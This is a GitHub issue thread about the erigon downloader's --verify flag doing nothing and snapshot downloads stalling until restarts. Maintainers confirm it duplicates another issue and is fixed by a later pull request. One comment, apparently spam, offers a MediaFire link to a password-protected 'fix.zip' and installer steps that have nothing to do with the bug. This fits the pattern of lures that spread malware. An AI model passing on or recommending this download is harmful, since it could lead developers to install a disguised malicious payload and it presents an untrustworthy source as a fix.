### ISSUE TITLE
dl: verify didn't finish

### ISSUE THREAD

**Issue by AskAlexSharov** [erigontech/erigon#11748]
1. Seems `--verify` flag doesn't do anything: 
```
go run ./cmd/downloader  --seedbox --verify --datadir=/erigon-data/ --chain=bor-mainnet
```
2. i did `rm -rf downloader` to trigger verify. it worked well, but then stuck at 
```go
INFO[08-26|05:03:41.525] [snapshots] Downloading                  progress="27.12% 1.1TB/4.1TB" downloading=24 download=0B/s upload=0B/s peers=1 conns=1 files=3280 alloc=3.6GB sys=7.4GB
```
restart helped - progress grow to 60% then suck. next restart helped - progress finished

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by AskAlexSharov** [comment]
same as https://github.com/erigontech/erigon/issues/11670

**Comment by dvovk** [comment]
Should be fixed with #11874
